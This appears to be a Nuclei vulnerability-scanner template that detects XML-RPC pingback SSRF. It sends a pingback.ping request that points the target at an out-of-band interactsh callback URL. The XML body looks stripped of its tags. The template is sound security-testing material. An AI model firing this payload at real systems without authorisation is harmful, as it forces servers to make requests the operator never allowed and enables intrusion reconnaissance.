id: xmlrpc-pingback-ssrf info: name: XMLRPC Pingback SSRF author: geeknik reference: https://hackerone.com/reports/406387 severity: high tags: ssrf,generic requests: - raw: - | POST /xmlrpc/pingback HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 pingback.ping http://{{interactsh-url}} matchers: - type: word part: interactsh_protocol words: - "http"